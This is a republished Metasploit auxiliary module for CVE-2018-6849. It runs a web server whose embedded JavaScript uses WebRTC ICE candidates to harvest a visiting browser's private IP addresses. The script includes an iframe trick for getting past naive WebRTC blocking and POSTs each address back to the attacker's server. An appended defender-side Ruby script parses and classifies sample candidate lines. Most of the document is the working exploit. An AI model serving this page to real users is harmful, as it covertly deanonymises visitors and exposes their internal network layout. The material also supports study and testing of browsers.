DuckDuckGo 4.2.0 WebRTC Private IP Leakage
Source: metasploit.com  Author: Coles  Published: 2018-04-04
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
        'Description'    => %q(
          This module exploits a vulnerability in browsers using a well-known property of WebRTC (Web Real-Time Communications), which enables web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Brendan Coles', #MSF Module
          'Dhiraj Mishra'  #MSF Module
        ],
        'References'     => [
          [ 'CVE', '2018-6849' ],
          [ 'URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html' ]
        ],
        'DisclosureDate' => 'Jan 26 2018',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
  end

  def run
    exploit # start http server
  end

  def setup
    # WebRTC IP enumeration JavaScript served to the browser; code from: https://github.com/diafygi/webrtc-ips
    @html = <<-JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var useWebKit = !!window.webkitRTCPeerConnection;

    //bypass naive webrtc blocking using an iframe
    if(!RTCPeerConnection){
        //NOTE: you need to have an iframe in the page right above the script tag
        //
        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
        //<script>...getIPs called in here...
        //
        var win = iframe.contentWindow;
        RTCPeerConnection = win.RTCPeerConnection
            || win.mozRTCPeerConnection
            || win.webkitRTCPeerConnection;
        useWebKit = !!win.webkitRTCPeerConnection;
    }

    //minimal requirements for data connection
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    function handleCandidate(candidate){
        //match just the IP address
        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
        var ip_addr = ip_regex.exec(candidate)[1];

        //remove duplicates
        if(ip_dups[ip_addr] === undefined)
            callback(ip_addr);

        ip_dups[ip_addr] = true;
    }

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate)
            handleCandidate(ice.candidate.candidate);
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});

    }, function(){});

    //wait for a while to let everything done
    setTimeout(function(){
        //read candidate info from local description
        var lines = pc.localDescription.sdp.split('\\n');

        lines.forEach(function(line){
            if(line.indexOf('a=candidate:') === 0)
                handleCandidate(line);
        });
    }, 1000);
}

getIPs(function(ip){
  //console.log(ip);
  var xmlhttp = new XMLHttpRequest;
  xmlhttp.open('POST', window.location, true);
  xmlhttp.send(ip);
});
</script>
    JS
  end

  # GET: serve the enumeration page. POST: the page sends each IP address it
  # discovered back to this same URI in the request body, one request per address.
  def on_request_uri(cli, request)
    case request.method.downcase
    when 'get'
      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
      send_response(cli, @html)
    when 'post'
      print_status("#{cli.peerhost}: Received reply:")
      puts request.to_s
    else
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
    end
  end
end
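As an added defender-side example (not part of the module or of the original page), the following Ruby script shows what the `a=candidate:` lines the module collects actually disclose, and where that collection stops. It parses candidate lines using the RFC 5245 field layout, classifies each address (RFC 1918/ULA private, loopback, link-local, mDNS `.local` name, public), includes the `raddr` field of server-reflexive candidates because it carries the same private address as a host candidate, and applies the module's own IP regex to each line. Browsers that replace host-candidate addresses with mDNS names (Chrome has done this by default since version 74, and later Firefox releases do likewise) or that emit compressed IPv6 addresses produce no match, and the module's `ip_regex.exec(candidate)[1]` would throw on a null result. The candidate lines are constructed for this example.

```ruby
require 'ipaddr'

# Constructed sample "a=candidate:" lines of the kind the module's
# handleCandidate() reads from pc.localDescription.sdp. The addresses are
# private/documentation ranges and a made-up mDNS name, not real hosts.
SAMPLE_CANDIDATES = [
  'a=candidate:842163049 1 udp 2122260223 192.168.1.23 56143 typ host generation 0',
  'a=candidate:842163049 2 udp 2122260222 192.168.1.23 56144 typ host generation 0',
  'a=candidate:1853887674 1 udp 1686052607 203.0.113.5 56143 typ srflx raddr 192.168.1.23 rport 56143 generation 0',
  'a=candidate:3210245341 1 udp 2122260223 7a6f0f5e-1d7b-4f3c-9a5b-2b4f1c2e3d4f.local 51234 typ host generation 0',
  'a=candidate:2 1 udp 2122262783 fe80::1c3a:9bff:fe12:3456 53421 typ host generation 0'
].freeze

PRIVATE_RANGES = %w[10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 fc00::/7].map { |r| IPAddr.new(r) }
LINK_LOCAL     = %w[169.254.0.0/16 fe80::/10].map { |r| IPAddr.new(r) }
LOOPBACK       = %w[127.0.0.0/8 ::1/128].map { |r| IPAddr.new(r) }

# The same pattern the module's JavaScript applies to each candidate string
# (dotted IPv4, or an uncompressed 8-group IPv6). Returns the first match or nil.
MODULE_IP_REGEX = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/

def module_regex_extract(candidate_line)
  m = MODULE_IP_REGEX.match(candidate_line)
  m && m[1]
end

# Parse one ICE candidate line (RFC 5245 section 15.1 layout: foundation component
# transport priority connection-address port "typ" type [raddr X rport Y] ...).
def parse_candidate(line)
  fields = line.sub(/\Aa=/, '').split(' ')
  return nil unless fields[0].to_s.start_with?('candidate:') && fields.size >= 8
  typ = fields.index('typ')
  return nil unless typ && fields[typ + 1]
  raddr = fields.index('raddr')
  {
    address: fields[4],
    type:    fields[typ + 1],
    raddr:   raddr ? fields[raddr + 1] : nil
  }
end

# What a connection address actually discloses to the page.
def classify_address(address)
  return :mdns if address.end_with?('.local')
  begin
    ip = IPAddr.new(address)
  rescue ArgumentError
    return :unparseable
  end
  return :loopback   if LOOPBACK.any?       { |r| r.include?(ip) }
  return :link_local if LINK_LOCAL.any?     { |r| r.include?(ip) }
  return :private    if PRIVATE_RANGES.any? { |r| r.include?(ip) }
  :public
end

# Summarise a candidate list: unique addresses per category (the srflx
# "raddr" field is included, since it carries the same private address the
# host candidate would) and whether any RFC 1918 / ULA address is exposed.
def leak_report(lines)
  by_kind = Hash.new { |h, k| h[k] = [] }
  lines.each do |line|
    cand = parse_candidate(line)
    next unless cand
    [cand[:address], cand[:raddr]].compact.each do |addr|
      kind = classify_address(addr)
      by_kind[kind] << addr unless by_kind[kind].include?(addr)
    end
  end
  { addresses: by_kind, leaks_private: by_kind.key?(:private) }
end

if __FILE__ == $PROGRAM_NAME
  report = leak_report(SAMPLE_CANDIDATES)
  report[:addresses].each { |kind, addrs| puts "#{kind}: #{addrs.join(', ')}" }
  puts "private address exposed: #{report[:leaks_private]}"
  SAMPLE_CANDIDATES.each do |line|
    puts "module regex -> #{module_regex_extract(line).inspect}"
  end
end
```

Run against real output (for instance, candidate lines logged by the module's POST handler, or `pc.localDescription.sdp` from a browser under test), `leak_report` tells you whether a given browser configuration still exposes an RFC 1918 address directly, and the `module_regex_extract` results show which candidate formats the collection script silently misses.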

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved